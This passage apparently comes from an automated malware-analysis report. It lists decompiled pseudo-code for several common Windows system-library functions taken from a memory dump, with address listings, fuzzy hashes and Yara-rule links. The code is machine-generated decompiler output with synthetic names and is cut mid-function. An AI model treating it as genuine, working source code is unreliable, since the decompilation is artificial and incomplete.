						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0546740d
0x0546740d
0x05467412
0x05467413
0x05467416
0x05467418
0x0546741c
0x0546741f
0x05467422
0x05467422
0x05467428
0x0546742a
0x0546742a
0x05467451
0x05467432
0x0546744f
0x0546744f
0x00000000
0x05467434
0x05467438
0x05467443
0x05467517
0x05467517
0x0546751a
0x05467535
0x05467520
0x05467527
0x0546752c
0x05467531
0x05467533
0x00000000
0x05467533
0x00000000
0x05467531
0x0546754b
0x0546754f
0x0546755c
0x0546755c
0x0546755f
0x05467560
0x05467561
0x05467562
0x05467563
0x05467568
0x0546756a
0x0546756c
0x0546756d
0x0546756d
0x0546756f
0x05467572
0x05467574
0x05467577
0x0546757c
0x0546757f
0x00000000
0x05467551
0x05467551
0x05467551
0x05467553
0x05467553
0x05467449
0x05467449
0x0546744c
0x0546744c
0x00000000
0x0546744c
0x05467443
0x0546750e
0x05467514
0x05467514
0x05467455
0x05467469
0x0546746d
0x00000000
0x05467473
0x05467473
0x05467476
0x05467480
0x05467484
0x0546748e
0x05467493
0x05467493
0x05467496
0x05467499
0x054674a1
0x054674b1
0x054674b5
0x00000000
0x054674bb
0x054674c1
0x054674c1
0x054674c4
0x054674c5
0x054674c6
0x054674c7
0x054674c8
0x054674cd
0x00000000
0x054674d3
0x054674d3
0x054674d6
0x054674d8
0x054674db
0x054674dd
0x054674e0
0x054674e7
0x054674ee
0x054674ee
0x054674f4
0x054674f9
0x00000000
0x054674fb
0x054674fb
0x054674fd
0x05467500
0x05467503
0x05467505
0x05467505
0x054674f9
0x00000000
0x054674cd
0x054674b5
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: e5cc832e7c3fe8d3a1a09ba9aac46dbbdf1a666cb7185c3f4b03b49a2e4c0f2c
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 78518B71600606EFDB15CF54C480B96BBB6FF45308F15C1EAE9089F222E371E946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 053C4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E053C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x548d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E053DFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x5487bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E053DB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L053B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0539CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E053DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E053DF380(_t67 + 0xc, 0x5375138, 0x10) == 0) {
								 *0x54860d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E053C4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E053C4E70(0x54886b0, 0x53c5690, 0, 0) != 0) {
					_t46 = E0539CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x053c4d3b
0x053c4d4d
0x053c4d53
0x053c4d58
0x053c4d65
0x053c4d6c
0x053c4d71
0x053c4d77
0x053c4d7f
0x053c4d8c
0x053c4d8e
0x053c4dad
0x053c4db0
0x053c4db7
0x053c4db8
0x053c4db9
0x053c4dba
0x053c4dbb
0x053c4dc1
0x053c4dc8
0x053c4dcc
0x053c4dd5
0x053c4dde
0x053c4ddf
0x053c4de0
0x053c4de1
0x053c4de6
0x053c4de7
0x053c4de9
0x053c4df3
0x00000000
0x00000000
0x05406c7c
0x05406c8a
0x05406c8a
0x05406c9d
0x05406ca7
0x05406cac
0x05406cb2
0x05406cb9
0x00000000
0x05406cbf
0x05406cbf
0x00000000
0x05406cbf
0x05406cb9
0x053c4dfb
0x05406ccf
0x05406cd3
0x053c4e32
0x053c4e39
0x05406ce0
0x05406cf2
0x05406cf2
0x05406ce0
0x053c4e3f
0x053c4e41
0x053c4e51
0x053c4e51
0x053c4e03
0x053c4e03
0x053c4e09
0x053c4e0f
0x053c4e57
0x00000000
0x00000000
0x053c4e1b
0x053c4e30
0x053c4e5b
0x053c4e5b
0x00000000
0x053c4e30
0x053c4e11
0x053c4e11
0x053c4e16
0x00000000
0x053c4e16
0x053c4e01
0x00000000
0x053c4e01
0x053c4da5
0x05406c6b
0x00000000
0x053c4dab
0x053c4dab
0x00000000
0x053c4dab

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dee0d44cb7b7dcb79b6cfd511bafdfdc251cc5f6684a458076f328103d0acc3
Instruction ID: 1f7e7e516ee8796be65f38161f4ff3a651123e53b835081807e512e586e68556
Opcode Fuzzy Hash: 5dee0d44cb7b7dcb79b6cfd511bafdfdc251cc5f6684a458076f328103d0acc3
Instruction Fuzzy Hash: 3441B471A403189FEF21DF24CC95FAABBBAEB45610F0500EEE9469B681D7B4DD40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 053A8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E053A8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x548d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E053DB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E053AE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x5371180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E053C1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E053D3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E053A8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x053a8a0a
0x053a8a1c
0x053a8a23
0x053a8a2e
0x053a8a30
0x053a8a36
0x053a8a3c
0x053a8a3e
0x053a8a4a
0x053a8a52
0x053a8a9c
0x053a8aae
0x053a8a58
0x053a8a5e
0x053a8a6a
0x053a8a6f
0x053a8a75
0x053a8a7d
0x053a8a85
0x053a8a86
0x053a8a89
0x053a8a93
0x053a8a99
0x053a8a9b
0x00000000
0x053a8aaf
0x053a8abe
0x053a8ac3
0x053a8acb
0x053a8ad7
0x053a8ae0
0x053a8af1
0x00000000
0x053a8af1
0x053a8acd
0x053a8ad5
0x053a8afb
0x053a8afd
0x053a8aff
0x053a8b07
0x053a8b22
0x053a8b24
0x053a8b2a
0x053a8b2e
0x053a8b3f
0x053a8b78
0x053a8b41
0x053a8b52
0x053a8b54
0x053a8b5c
0x053a8b74
0x053a8b74
0x053a8b5c
0x053a8b3f
0x053a8b5e
0x053a8b61
0x053a8b64
0x053a8b64
0x053a8b6c
0x053a8b6c
0x053a8b11
0x053f9cd5
0x053f9cd5
0x053a8b17
0x053a8b1a
0x053a8b1a
0x00000000
0x053a8ad5
0x053a8a89

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17b7db8ba6f9a3986687e464f615620e44ee13fcef93470173888bfd88b262b
Instruction ID: f2b26187e59e9b28a1c21365b0c62ff82df3419dc9e4bd58d7ae314d070799b7
Opcode Fuzzy Hash: e17b7db8ba6f9a3986687e464f615620e44ee13fcef93470173888bfd88b262b
Instruction Fuzzy Hash: 7D4160B6A0122C9BDB24DF15DC88AB9F7F9FB44300F1045E9D81997251EB709E81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 054169A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E054169A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x548d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L053A6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E05416BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E053D9980() >= 0) {
							E053B2280(_t56, 0x5488778);
							_t77 = 1;
							_t68 = 1;
							if( *0x5488774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x5488774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0539B6F0(0x537c338, 0x537c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E053D9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E053D95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E053AFFB0(_t68, _t77, 0x5488778);
				}
				_pop(_t78);
				return E053DB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x054169b5
0x054169be
0x054169c3
0x054169c9
0x054169cc
0x054169d1
0x054169d3
0x054169de
0x054169e1
0x054169ea
0x054169f6
0x054169fe
0x05416a13
0x05416a14
0x05416a15
0x05416a16
0x05416a1e
0x05416a26
0x05416a31
0x05416a36
0x05416a37
0x05416a40
0x05416a49
0x05416a4a
0x05416a53
0x05416a59
0x05416a5d
0x05416a5e
0x05416a64
0x05416a67
0x05416a6a
0x05416a6d
0x05416a70
0x05416a77
0x05416a7d
0x05416a86
0x05416a89
0x05416a9c
0x05416a9f
0x05416aa2
0x05416aa5
0x05416aaf
0x05416ab1
0x05416ab8
0x05416ab9
0x05416abb
0x05416abe
0x05416ac5
0x05416ac5
0x05416aaf
0x05416a40
0x05416a26
0x054169fe
0x05416ace
0x05416ad0
0x05416ad3
0x05416ad8
0x05416adf
0x05416adf
0x05416ae8
0x05416aef
0x05416aef
0x05416af9
0x05416b06

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1578100296488af851a01e553a21c81be8a8b6e0a484f12687bfccaf64752e2e
Instruction ID: ec6ddc80eb98f03a1ce0f4c81eeea5392c42992f13b0a18f637e08227397d5fe
Opcode Fuzzy Hash: 1578100296488af851a01e553a21c81be8a8b6e0a484f12687bfccaf64752e2e
Instruction Fuzzy Hash: CB4177B2E00208AFDB24DFA5D940BFEBBF8FF48714F14856AE815A7240DB749905CB54

Uniqueness

Uniqueness Score: -1.00%

Function 053D3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E053A7B60(0, _t61, 0x53711c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E053A7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L053B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x053d3d4c
0x053d3d50
0x053d3d55
0x053d3d5e
0x0540e79a
0x00000000
0x0540e79a
0x053d3d68
0x0540e789
0x053d3d9d
0x053d3da3
0x053d3daf
0x053d3db5
0x053d3dbc
0x053d3dc4
0x053d3dc9
0x053d3dce
0x0540e7ae
0x0540e7ae
0x053d3dde
0x053d3de2
0x053d3de7
0x053d3e0d
0x053d3e13
0x053d3e16
0x053d3e1e
0x053d3e25
0x053d3e28
0x00000000
0x00000000
0x053d3e2a
0x053d3e2f
0x053d3e37
0x053d3e37
0x00000000
0x053d3e37
0x053d3e31
0x00000000
0x053d3e31
0x053d3e20
0x053d3e20
0x053d3e35
0x00000000
0x053d3de9
0x053d3de9
0x053d3de9
0x053d3dee
0x053d3dfd
0x053d3dff
0x053d3e02
0x053d3e05
0x053d3e05
0x00000000
0x053d3df0
0x053d3de7
0x0540e78f
0x0540e794
0x053d3d79
0x053d3d84
0x053d3d89
0x053d3d8e
0x00000000
0x0540e7a4
0x053d3d96
0x053d3d9a
0x00000000
0x053d3d9a
0x00000000
0x0540e794
0x053d3d6e
0x053d3d73
0x00000000
0x0540e7b5
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e93f5d7d63ab1c06d770e2af89d5524418fca70cea89101940f8fd24e5ee6c
Instruction ID: ceeaf5b27bd987f2795635ade076beef8c8fec181530c675740dd602fd3379da
Opcode Fuzzy Hash: 01e93f5d7d63ab1c06d770e2af89d5524418fca70cea89101940f8fd24e5ee6c
Instruction Fuzzy Hash: AA319073A056149BC724CF29E441A7BFBBAFF45700B15886AE846CB790E674DC50CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 053CA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E053CA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x5470220);
				E053ED08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x5487b9c; // 0x0
				_t55 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E053ED0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x5487b10 =  *0x5487b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x548536c; // 0x32fade8
					if( *_t51 != 0x5485368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x5485368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x548536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E053CA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x053ca61c
0x053ca61e
0x053ca623
0x053ca628
0x053ca62b
0x053ca62d
0x053ca648
0x053ca64a
0x053ca64f
0x05409b44
0x053ca6ec
0x053ca6f1
0x053ca6f1
0x053ca655
0x053ca657
0x053ca65a
0x053ca65d
0x053ca662
0x053ca663
0x053ca667
0x053ca668
0x053ca66d
0x053ca706
0x053ca706
0x05409bda
0x05409be6
0x05409beb
0x00000000
0x05409beb
0x053ca679
0x05409b7a
0x00000000
0x05409b7a
0x053ca683
0x053ca6f4
0x053ca6f7
0x053ca6f9
0x053ca6fd
0x053ca6a0
0x053ca6a0
0x053ca6ad
0x053ca6af
0x053ca6b4
0x05409ba7
0x05409bac
0x00000000
0x00000000
0x05409bc6
0x05409bce
0x05409bd1
0x05409bd3
0x05409bd3
0x00000000
0x05409bd1
0x053ca6bd
0x053ca6c3
0x053ca6c6
0x053ca6d2
0x053ca701
0x053ca704
0x00000000
0x053ca704
0x053ca6d4
0x053ca6d6
0x053ca6d9
0x053ca6db
0x053ca6e1
0x053ca6e6
0x053ca6e8
0x053ca6e8
0x053ca6ea
0x00000000
0x053ca6ea
0x053ca688
0x053ca692
0x053ca694
0x053ca699
0x00000000
0x00000000
0x053ca69d
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a8724b0c489766bd30715661d894cc889ee9eab1aacc27284885d45e0c2f183
Instruction ID: 34d433544c38677fe3bf504213fd40b64be36dc1f9594e645c11ff4ce02abaab
Opcode Fuzzy Hash: 6a8724b0c489766bd30715661d894cc889ee9eab1aacc27284885d45e0c2f183
Instruction Fuzzy Hash: DE414775A05209DFCB09DF58C894BE9BBF2FB49314F2980AEE805AB385D775AD01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 053BC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E053BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E053B7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05468D34(_v8, _t80);
					}
					E053B2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E053AFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05468833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E053AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E053DB180();
						if(_a4 != 0) {
							E053B2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E053BBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E053BBB2D(_t16, _t15);
						E053BB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E053AFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E053AFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E053AFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x053bc18d
0x053bc18f
0x053bc191
0x053bc19b
0x053bc1a0
0x053bc1d4
0x053bc1de
0x05402d6e
0x053bc1e4
0x053bc1e4
0x053bc1e4
0x053bc1ec
0x05402d7d
0x05402d7d
0x053bc1f3
0x053bc1ff
0x05402d88
0x05402d8d
0x05402d94
0x05402d94
0x05402d9f
0x05402da4
0x05402dab
0x05402db0
0x05402db2
